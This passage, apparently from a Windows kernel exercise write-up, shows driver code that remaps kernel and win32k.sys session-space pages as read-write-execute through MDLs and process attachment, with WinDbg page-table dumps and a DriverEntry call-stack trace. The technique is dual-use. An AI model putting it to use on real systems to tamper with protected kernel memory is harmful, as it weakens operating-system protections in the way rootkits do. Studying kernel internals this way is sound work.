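      // a mapping exists only if MmMapLockedPagesSpecifyCache succeeded (return codes 0 and 3)  
      if(code == 0 || code == 3)  
      {  
           unmap_mdl(&pMdl, (PVOID *)&new_address);  
      }  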
   
      return STATUS_SUCCESS;  
 }  
      

The driver creates an MDL describing a virtual address range, then probes and locks its pages and finally maps them to a new virtual address. As an extra, I call MmProtectMdlSystemAddress to ensure that the RWX protection is set, but while debugging I noticed that this protection is already in place after MmMapLockedPagesSpecifyCache (MmBuildMdlForNonPagedPool would normally have been more appropriate, but for the sake of this exercise this can be ignored). After the work is done, the MDL is released by unmapping its pages and deallocating it.

To verify that the protection is successfully changed, I made a simple test. I used the !pte debugger extension to translate the virtual address of the imagebase of monitor.sys:

kd> !pte 0xfffff8800459f000
VA fffff8800459f000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200110  
contains 0000000020CEE863
pfn 20cee     ---DA--KWEV

PTE at FFFFF6FC40022CF8
contains 800000003CDD7963
pfn 3cdd7     -G-DA--KW-V

(the command output has been edited for better readability)

Then, I repeated the test by using the virtual address that I obtained with MmMapLockedPagesSpecifyCache:

kd> !pte fffff8800d249000
VA fffff8800d249000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200348  
contains 0000000035879863
pfn 35879     ---DA--KWEV

PTE at FFFFF6FC40069248
contains 000000003CDD7963
pfn 3cdd7     -G-DA--KWEV

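The log shows that the original mapping lacks the executable protection (its PTE has bit 63, the no-execute bit, set and !pte shows no E flag), while the new mapping of the same physical page (pfn 3cdd7) is executable.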
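
The two PTE values can also be decoded by hand. The sketch below uses only the architecturally defined bits of an x64 page table entry (valid, write, no-execute and the page frame number field); the demo_* names are hypothetical, and the software-defined bits that Windows stores in a PTE are ignored.

```c
#include <stdint.h>

/* Hardware-defined bits of an x64 page table entry. */
#define DEMO_PTE_VALID (1ULL << 0)
#define DEMO_PTE_WRITE (1ULL << 1)
#define DEMO_PTE_NX    (1ULL << 63)

/* Page frame number: bits 12..51 of the entry. */
static uint64_t demo_pte_pfn(uint64_t pte)
{
    return (pte >> 12) & 0xFFFFFFFFFFULL;
}

/* A valid page is executable when the no-execute bit is clear. */
static int demo_pte_executable(uint64_t pte)
{
    return (pte & DEMO_PTE_VALID) && !(pte & DEMO_PTE_NX);
}

/* A valid page is writable when the write bit is set. */
static int demo_pte_writable(uint64_t pte)
{
    return (pte & DEMO_PTE_VALID) && (pte & DEMO_PTE_WRITE);
}
```

Feeding it 0x800000003CDD7963 and 0x000000003CDD7963 gives the same page frame number for both entries, with only the second one executable.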
As suggested by the exercise, I tested the same code using the imagebase address of win32k.sys, which is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated with any session. Thus, the session space virtual addresses are not mapped there and cannot be used to build MDLs.
I experimented a bit and found a simple trick to work around this problem: since the System process is not associated with a session, the code has to run in the context of a process that is. This simple modification makes the driver code work:
      KAPC_STATE apcstate;  
      
      // taken from fffff960`00060000 fffff960`00370000  win32k   
      KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess  
      nonpaged_address = (BYTE *)0xfffff96000060000;  
   
      code = change_protection(nonpaged_address, 0x10, &pMdl, (PVOID *)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  
   
      KeUnstackDetachProcess(&apcstate);  

I used KeStackAttachProcess to switch to the context of Explorer.exe, which is associated with the currently logged in user, but any other process running inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). While debugging this code, I tested the accessibility of the win32k.sys imagebase address via WinDbg before the driver attached to Explorer:

kd> !pte 0xfffff96000060000
VA fffff96000060000

PXE at FFFFF6FB7DBEDF90  
contains 0000000000000000

not valid

kd> db 0xfffff96000060000
fffff960`00060000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

Translating the virtual address to a physical one fails at the very first level (the PXE is invalid), and dumping the bytes at that memory address returns no data. However, as soon as I step beyond KeStackAttachProcess the address becomes available:

kd> !pte fffff960`00060000
VA fffff96000060000

PXE at FFFFF6FB7DBEDF90  
contains 00000000184BC863
pfn 184bc     ---DA--KWEV

PPE at FFFFF6FB7DBF2C00  
contains 0000000018ACD863
pfn 18acd     ---DA--KWEV

PDE at FFFFF6FB7E580000  
contains 0000000018DCC863
pfn 18dcc     ---DA--KWEV

PTE at FFFFF6FCB0000300
contains 8030000012588201
pfn 12588     C------KR-V

and the driver code works too, creating a mapping with RWX attribute:

kd> !pte fffff8800e0b4000
VA fffff8800e0b4000

PXE at FFFFF6FB7DBEDF88  
contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

PPE at FFFFF6FB7DBF1000  
contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200380  
contains 0000000030237863
pfn 30237     ---DA--KWEV

PTE at FFFFF6FC400705A0
contains 0000000012588963
pfn 12588     -G-DA--KWEV

If I step further with the debugger, past KeUnstackDetachProcess, the address becomes invalid again.
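
The addresses of the entries printed by !pte can be reproduced with a little arithmetic, which also shows that the two image bases go through different PXEs (0xF88 versus 0xF90 in the dumps above). This sketch assumes the fixed self-map bases that match the output in this post; recent Windows 10 releases randomize them, so the constants are an assumption that does not hold everywhere. The demo_* names are hypothetical.

```c
#include <stdint.h>

/* Assumed fixed self-map bases, consistent with the !pte output in this post. */
#define DEMO_PTE_BASE 0xFFFFF68000000000ULL
#define DEMO_PXE_BASE 0xFFFFF6FB7DBED000ULL

/* Address of the PTE mapping `va`: one 8-byte entry per 4 KB page. */
static uint64_t demo_pte_address(uint64_t va)
{
    return DEMO_PTE_BASE + (((va >> 12) & 0xFFFFFFFFFULL) << 3);
}

/* Address of the PXE (top-level entry) for `va`: index taken from bits 39..47. */
static uint64_t demo_pxe_address(uint64_t va)
{
    return DEMO_PXE_BASE + (((va >> 39) & 0x1FF) << 3);
}
```

For example, demo_pte_address(0xfffff96000060000) yields FFFFF6FCB0000300 and demo_pxe_address of the same address yields FFFFF6FB7DBEDF90, matching the win32k.sys dump.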

8)
To figure out which function calls DriverEntry, I wrote a dummy driver, placed a DbgBreakPoint() call in its entry point, and ran it under a kernel debugger so that I could dump the stack:

driver!DriverEntry+0x3a
nt!IopLoadDriver+0xa07
nt!IopLoadUnloadDriver+0x55
nt!ExpWorkerThread+0x111
nt!PspSystemThreadStartup+0x5a
nt!KxStartSystemThread+0x16

The dump shows the chain of calls that led to DriverEntry. The function directly responsible for calling the entry point is IopLoadDriver, which is in turn called by IopLoadUnloadDriver. The latter manages both the loading and the unloading of a driver (calling the entry point or the driver unload routine respectively), and it runs in a system worker thread, as shown by the three frames ExpWorkerThread, PspSystemThreadStartup and KxStartSystemThread.